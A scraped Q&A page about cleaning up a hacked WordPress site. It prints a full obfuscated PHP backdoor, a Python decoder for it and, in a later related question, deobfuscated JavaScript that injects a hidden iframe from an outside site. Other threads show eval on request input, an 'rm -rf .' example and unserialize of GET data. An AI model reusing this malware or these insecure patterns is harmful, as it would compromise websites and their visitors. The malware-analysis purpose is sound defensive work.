WordPress site hacked: Unobfuscate malicious code [closed] - php

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 7 years ago.
One of the sites I manage got hacked through a WordPress install in the shared environment.
It looks like some malware has been injected into all the PHP files on the server. I've managed to delete all references of the code and changed all the passwords. Subsequently I've been getting failed login attempts from an IP in the Ukraine...
<?php
if (!isset($GLOBALS["\x61\156\x75\156\x61"]))
{
$ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
if ((!strstr($ua, "\x6d\163\x69\145")) and(!strstr($ua, "\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"] = 1;
}
?>
<?php
$vkvmlmaavg = 'zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfs%x7860%x5c%x7825}X;!sp!*#opo#>>}R%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6N}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x78x5c%x782fq%x5c%x7825>2q%x5c%x7825<#x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x6c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdo;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%xMPT7-NBFSUT%x5c%x7860LDPT7-U256]y6g]257]y86]267]y74]275]y7:]<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x78{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x780{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860825-bubE{h%x5c%x7825)sutcc%x7824]25%x5c%x7824-%x5c%x7824-!c%x7825%x5c%x787f!<X>b%x5c%x7825Z334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]27fbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x78:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%c%x7825>U<#16,47R57,27R66,#%7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x782*#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)y81]265]y72]254]y76]61]y33]6#]y76]277]y72]265]y39]274]y85]273]yq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%xyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7826<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]if((function_exists("%x6f%142%x5f%163%x74%141%x72%164"%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)#Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x78c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*1x5c%x7824%x5c%x785c%x5
c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78.973:8297f:5297e:56-%x5c%x7878r.985:c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>5!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{hx782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x825)euhA)3of>2bd%x5c%x7825!<5h%x5%x5c%x7825%x5c%x782fh%x5c%x7825)n]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x55c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-sf*#npd%x5c%x782f#)rrd%x5c%x78%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x5)!gj!~<ofmy%x5c%x7825,3,j%25>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782frx7824-%x5c%x7824*<!~!ds]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%7x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%xun>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x}%x5c%x7878;0]=])0#)U!%x5cx5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x76g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]y83]273]y76]277#<%x5c%x7825t2w>#]*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!*>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpetj{fpg)%x5c%x7825%x5c%7f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopw6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!ufs:~928>>%x5c%x7822:ftmbg39*56A:>c%x7860TW~%x5c%x7824<%x5c%x78ex5c%x787f!>>%x5c%x7822!pd%x5c%x7:55946-tr.984:75983:48984:71TW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%25-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5qmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c37]278]225]241]334]368]32mgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x78227
2qj%x5c%x7825)7gj6<*x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgQUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78268]y7f#<!%x5c%x7825tc%x785cq%x5c%x78257%x5c%x782f7###7%xx7860{6~6<tfs%x5c%x7825.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x78tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782sv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%d%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x525z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x525zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#Qw]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!7824-%x5c%x7824<%x5c%x7825j,,*!|%x5%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutj3]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825mfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R2ov{h19275j{hnpd19275fub%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfbqov>*ofmy%x5c%x7825)utjm!|!*5!%x525s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6FOJ%x5c%x7860GB)fubfsdXA%x5c%452]88]5]48]32M3]317]445]212]445]fmji%x5c%x7878:<##:>:h%x5c%x724!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]760hA%x5c%x7827pd%x5c%x782%x5c%x7825-#+I#)q%x5c%x7825:vt)fubmgoj{hA!osvufs!~<3,j%x5c%x_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x78605)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0x787f%x5c%x787f%x5c%x787F.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ld2]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x782
5t::!>!%x5c%x78825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x786%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]6f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ft4-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=turn chr(ord($n)-1);} #error_reporting(0); preg_replace("%x2f%50%]281Ld]245]K2]285]Ke]525cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x782%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x58]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6}.;%x5c%x7860UQPMSVD!-id%x5))) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){re25)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x74+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x78c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uc%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>%x5c%x7825!|!*)323zbek!~!<b%x5#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%825:<#64y]552]e7y]#>n%x5c%x7825<#37224Ypp3)%x5c%x7825cB%x5c%x7825igj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpd]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%y74]273]y76]252]y85]c%x7825%x5c%x782f#0#%x5c%x782e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,54]y76#<%x5c%x7825tmw!>!#]y84]27525c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x78hmg%x5c%x7825!<12>j%x5c%x782#-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3", NULL); 
}4%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%14252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]yx785cq%x5c%x7825%x5c%x7827j>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x78608]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}Ux787f;!opjudovg}k~~9{d%x5c%x7825:osv*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;uA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]2]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6!2p%x5c%x7825!*3>?*2b%x5c%x7825)7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cdc%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x78=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x786x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP56%152%x66%147%x67%42%x2c%163%x73Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj65,d7R17,67R37,#%x5c%x782fq%x556<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x7825x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>76]277]y72]265]y39]271]y83]256]y78]248]y83]256]25}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)x7825!osvufs!*!+A!>!<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%))1%x5c%x782f35.)1%x5c%x782f12]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x78<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6ww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5cc%x7825tzw%x5c%x782f%x5c%x
7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#Kc%x7825!*9!%x5c%x7827!hmg%x5c%x782yfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!5r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%) && (!isset($GLOBALS["%x61%156%x75%156%x61"])5c%x782f7^#iubq#%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u25%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%7f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<43]321]464]284]364]6]2/(.*)/epreg_replacekjfgnktllk';
$acpbcdcqwr = explode(chr((169 - 125)), '1655,54,9690,46,6518,63,6253,65,7910,69,223,49,8581,31,7446,62,6068,59,6431,60,9241,70,1801,68,5545,25,8758,56,1605,50,8661,68,9867,70,85,41,7979,55,4228,45,9814,53,1709,36,806,52,417,28,5389,29,3938,67,2879,51,2355,66,4132,36,9736,21,7559,27,4273,58,1137,70,2795,43,8459,54,768,38,4005,39,8034,63,4168,23,3430,64,1909,54,5334,55,477,53,10029,55,4191,37,3375,55,4401,43,8915,56,6491,27,6844,56,9624,66,3661,32,6000,68,6581,43,858,25,5598,32,4686,47,7049,61,595,46,3791,36,9484,34,2630,27,5870,69,5243,34,272,37,2066,47,7350,28,2113,63,4884,44,1490,56,8814,54,8195,32,7685,32,2956,57,2228,33,7206,29,2551,29,641,41,7235,38,7847,63,7586,44,2838,41,3097,55,1305,59,0,52,1427,63,8227,41,3304,49,5630,35,4044,67,4444,22,6900,30,916,33,8991,61,6784,60,9518,51,9355,64,52,33,354,63,2421,68,7811,36,3597,34,7110,40,5136,23,3895,43,1077,60,9982,47,8971,20,530,65,5780,24,6127,60,5075,61,8729,29,1207,28,188,35,309,45,5804,66,7771,40,3220,30,3250,54,2930,26,8368,40,1869,40,5731,49,4802,47,1392,35,3013,50,8097,62,7273,33,3063,34,7186,20,445,32,4111,21,9311,44,732,36,2657,69,2261,33,5570,28,3152,68,5451,29,6983,36,2294,61,1235,70,5665,66,949,58,4928,53,883,33,9052,47,1963,67,9937,45,5159,38,5197,46,3827,43,2580,50,4849,35,1546,59,6187,66,3353,22,2726,23,1007,70,5480,65,5939,61,7019,30,126,62,7306,44,6340,43,9569,55,9183,58,4584,65,3721,70,9757,57,4466,63,2489,62,2030,36,4733,69,3693,28,7150,36,8513,68,8159,36,682,50,4649,37,6318,22,8612,49,7717,54,1745,56,7378,56,3870,25,9128,55,5418,33,10084,22,3494,66,9099,29,6624,59,5033,42,4981,52,8307,61,8268,39,5277,57,3560,37,4331,70,8408,51,6731,53,4529,55,3631,30,6383,48,9419,65,6930,53,2176,52,6683,48,7508,51,8868,47,1364,28,7630,55,2749,46,7434,12');
$krdnhuyxrk = substr($vkvmlmaavg, (38379 - 28273), (35 - 28));
if (!function_exists('bvbkmkuetp'))
{
function bvbkmkuetp($lkmdhuzumr, $syqugkbwaa)
{
$wkmwfztjxy = NULL;
for ($wpopdgyvwt = 0; $wpopdgyvwt < (sizeof($lkmdhuzumr) / 2); $wpopdgyvwt++)
{
$wkmwfztjxy. = substr($syqugkbwaa, $lkmdhuzumr[($wpopdgyvwt * 2)], $lkmdhuzumr[($wpopdgyvwt * 2) + 1]);
}
return $wkmwfztjxy;
};
}
$knticqyoeu = "\x20\57\x2a\40\x62\170\x71\151\x75\171\x62\146\x6d\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x36\55\x31\66\x39\51\x29\54\x20\143\x68\162\x28\50\x35\71\x30\55\x34\71\x38\51\x29\54\x20\142\x76\142\x6b\155\x6b\165\x65\164\x70\50\x24\141\x63\160\x62\143\x64\143\x71\167\x72\54\x24\166\x6b\166\x6d\154\x6d\141\x61\166\x67\51\x29\51\x3b\40\x2f\52\x20\167\x68\156\x75\164\x6c\152\x78\153\x70\40\x2a\57\x20";
$lrykfpczcb = substr($vkvmlmaavg, (55025 - 44912), (61 - 49));
$lrykfpczcb($krdnhuyxrk, $knticqyoeu, NULL);
$lrykfpczcb = $knticqyoeu;
$lrykfpczcb = (376 - 255);
$vkvmlmaavg = $lrykfpczcb - 1;
?>
My question is, what does this code do? I have tried quite a few obfuscation tools but to no avail. Is anyone able to help decipher this?

This question has been answered in another Stack Exchange site: https://security.stackexchange.com/questions/70579/is-this-a-backdoor
Excerpts from that answer:
This piece of highly obfuscated code contains a program to allow the hacker to dynamically append any HTML or javascript
...
It appears that a Wordpress vulnerability was introduced by an unpatched version of the MailPoet plugin
...
The key takeaway from this incident is to backup your data frequently and update your software conscientiously
Answered by https://security.stackexchange.com/users/9312/question-overflow
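A static way to read the short escaped strings in the question's code without executing any of it, as an added example that is not part of the original question or the linked answer. The function names are made up for this sketch; the sample lines are copied from the question, with the `$knticqyoeu` string cut off after its opening and closed early.

```python
import re

# PHP double-quoted strings accept \xHH (hex) and \OOO (octal) escapes;
# the injected code spells its identifiers this way.
_ESC = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
_DQ = re.compile(r'"((?:[^"\\]|\\.)*)"')  # one double-quoted literal
_CHR = re.compile(r'chr\(\(\s*(\d+)\s*-\s*(\d+)\s*\)\)')

# Decoded values that deserve a closer look when they were hidden behind escapes.
SUSPICIOUS = ("eval(", "preg_replace", "HTTP_USER_AGENT", "base64_decode")


def decode_php_escapes(raw):
    """Decode hex and octal escapes as plain text; nothing is executed."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)  # PHP wraps octal values above \377
    return _ESC.sub(repl, raw)


def fold_chr(source):
    """Replace constant chr((A - B)) calls with the character they produce."""
    def repl(m):
        return repr(chr((int(m.group(1)) - int(m.group(2))) % 256))
    return _CHR.sub(repl, source)


def triage(source, min_escapes=4):
    """Return (line, decoded, flagged) for each heavily escaped string literal."""
    findings = []
    for m in _DQ.finditer(source):
        raw = m.group(1)
        if len(_ESC.findall(raw)) < min_escapes:
            continue
        decoded = decode_php_escapes(raw)
        line = source.count("\n", 0, m.start()) + 1
        flagged = any(token in decoded for token in SUSPICIOUS)
        findings.append((line, decoded, flagged))
    return findings


# Copied from the question: the user-agent check and the opening of $knticqyoeu
# (that last string is truncated here and closed early).
SAMPLE = r'''<?php
if (!isset($GLOBALS["\x61\156\x75\156\x61"]))
{
$ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
if ((!strstr($ua, "\x6d\163\x69\145")) and(!strstr($ua, "\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"] = 1;
}
$knticqyoeu = "\x20\57\x2a\40\x62\170\x71\151\x75\171\x62\146\x6d\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28";
'''

if __name__ == "__main__":
    for line, decoded, flagged in triage(SAMPLE):
        print(line, "FLAG" if flagged else "    ", repr(decoded))
    print(fold_chr("explode(chr((169 - 125)), $data)"))
```

The flagged `eval(str_replace(` line is the one to read next: that decoded string is what the script passes to the function whose name it cuts out of `$vkvmlmaavg` with `substr`.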

Related

laravel vue multi language site : String as key [closed]

Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 5 years ago.
I have been searching for an easy no plugin solution.
I am using Laravel's string as key format for my translation file. I have an fr.json file and inside this file I have all the texts and their translations.
It works fine for Blade but I am not able to use it in my .vue files.
Please help me: how can I use this fr.json file in all of my .vue files?
Thank you.
If you want to get your translation files in Vue, you'd have to import them in your javascript.
First, set a meta tag in your head with the current language:
<meta name='locale' content='{{app()->getLocale()}}' />
And then in your javascript for this example resources/assets/js/app.js:
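// Read the locale from the <meta name="locale"> tag set above.
var locale = document.head.querySelector('meta[name="locale"]').content;
var lang = {};
// Key the translations by the locale value, not by the literal string "locale".
lang[locale] = require('../../lang/' + locale + '.json');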
Maybe you can do the same for the default/fallback language. Then a translate function would look like this:
function trans(key, replace) {
var message;
if (lang[locale][key] != undefined) {
message = lang[locale][key];
} else if (lang[defaultLocale][key] != undefined) {
message = lang[defaultLocale][key];
}
if (message) {
// Loop through each item of replace and string replace the message.
return message;
}
return key;
}
Something like this could work I think. Didn't test it and needs some tweaking but I think that this should be the idea when solving this problem.

How can I make a simple api that can connect to mysql? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 7 years ago.
I need help on how to make an API for PHP. I was trying to make one web server communicate with another webserver through PHP.
I also want it to update MySQL code. I was using $_GET but it was less secure. Here is my code, can you please take a look at it?
<?php
/*
example: website-url-here.com/?command=insert-command-here&password=testing
*/
$command = $_GET["command"];
$password = $_GET["password"];
if ($password == "testing") {
//Was not a good idea, less secure.
//echo eval($command);
//More secure
if ($command == "create-user")
{
//create user command here
}
else if ($command == "delete-user")
{
//delete user command here
}
else
{
die("Command is incorrect");
}
}
echo "Success";
?>
This question is way too open ended to answer in a StackOverflow answer. Try reading up a little on REST, and a lot on PDO, especially in the context of sanitizing user input.
Think about what would happen if somebody called your api with [url]?command=rm -rf .&password=testing

Check whether website is using sitemap and robots files [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 7 years ago.
How do I know whether the website is using robot.txt and sitemap.txt? I have done extracting keyword, description, title; however I am unable to find the way to code to check whether the website is using robot.txt and sitemap.txt.
I am doing something like this http://www.seoptimer.com/report/loadster.in/5553240531d12
Use file_get_contents:
$robotsContents = file_get_contents("http://targetdomain.com/robots.txt");
$sitemapContents = file_get_contents("http://targetdomain.com/sitemap.xml");
Check if the contents are false; false will mean 404 Not Found. Then check that it's not HTML content (because some sites redirect every URL) with strpos($robotsContents, '<html') === false; if there is no tag, that means it can be a txt or xml file.
So:
function pathExistsAndIsNotHtml($path) {
$contents = @file_get_contents($path); // @ suppresses the warning when the request fails
return ! empty($contents) && strpos($contents, '<html') === false;
}
if(pathExistsAndIsNotHtml("http://targetdomain.com/robots.txt")) {
echo 'http://targetdomain.com/robots.txt';
} else {
echo 'There is no robots.txt';
}
if(pathExistsAndIsNotHtml("http://targetdomain.com/sitemap.xml")) {
echo 'http://targetdomain.com/sitemap.xml';
} else {
echo 'There is no sitemap.xml';
}

PHP hand variable to another php document [closed]

Closed. This question needs details or clarity. It is not currently accepting answers.
Closed 9 years ago.
I'm trying to get a variable which I declared in one php file to another without including the whole first php
while($row = mysql_fetch_assoc($sql)) {
// Output vacation days
if($row['frtutage'] < 1) {
$verbraucht = "0";
} else {
$verbraucht = $row['frtutage'];
}
$resturlaub = $row['miturlaubstage'] + $row['mitutagevorjahr'] - $verbraucht;
$urlaubgesamt = $row['miturlaubstage'] + $row['mitutagevorjahr'];
I need the variable $resturlaub in the second PHP without calculating the variable again.
How do I do this? Or is it even possible?
Thanks.
edit: the first PHP file is about calculating vacation days and how much I have remaining after taking a few vacation days; in the second file I need the calculation of the remaining days, so I just want to use the variable again and not calculate it again
You can try something like
$var = 'random_query';
// URL-encode the serialized value so it survives as a query-string parameter
$page= 'yourpage.com/?my_var='.urlencode(serialize($var));
header("Location: $page");
exit;
and in your page you can get the value by
if (isset($_GET['my_var']))
{
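// PHP 7+: allowed_classes => false refuses to instantiate objects from request data
$my_var = unserialize($_GET['my_var'], ['allowed_classes' => false]);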
}
But it would depend on the size of that variable that you need to pass, and what is the purpose of the scripts.
If you don't want to include the whole first PHP file but only a variable, then you should create a third file (called variables.php or config.php, for example).
Then include variables.php in both files so the variable will be shared among your scripts.

How to find malicious code/malware on a website [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Closed 9 years ago.
My WordPress website recently became infected with malware and has been blacklisted. I thought I fixed it by updating the site and plugins and removing any code I didn't recognize.
I then used Sucuri Site Checker and it seemed okay, so I submitted a review request with Google. However, Google have said that it still contains malware in the form of malicious code (they referred to it as a code injection).
I am a bit lost for what to do. Is there a way to find the bit of code which Google is finding? The domain is sudorf.co.uk but it has malware so I wouldn't advise going there - no idea what the malware will be doing.
Any help would be greatly appreciated.
EDIT: I found that code a few days ago and deleted it, then I updated all versions etc. But obviously it has come back again. Does anyone have an idea how it might be getting there? My thoughts are that it's either from a plugin - which is why I am going to remove all of them. The other is the contact form - but I didn't think this would have allowed them to edit the header.php.
This is pure info. Your malware looks like this when it's de-obfuscated:
function k09() {
var static = 'ajax';
var controller = 'index.php';
var k = document.createElement('iframe');
k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
k.style.position = 'absolute';
k.style.color = '512';
k.style.height = '512px';
k.style.width = '512px';
k.style.left = '1000512';
k.style.top = '1000512';
if (!document.getElementById('k')) {
document.write('<p id=\'k\' class=\'k09\' ></p>');
document.getElementById('k').appendChild(k);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
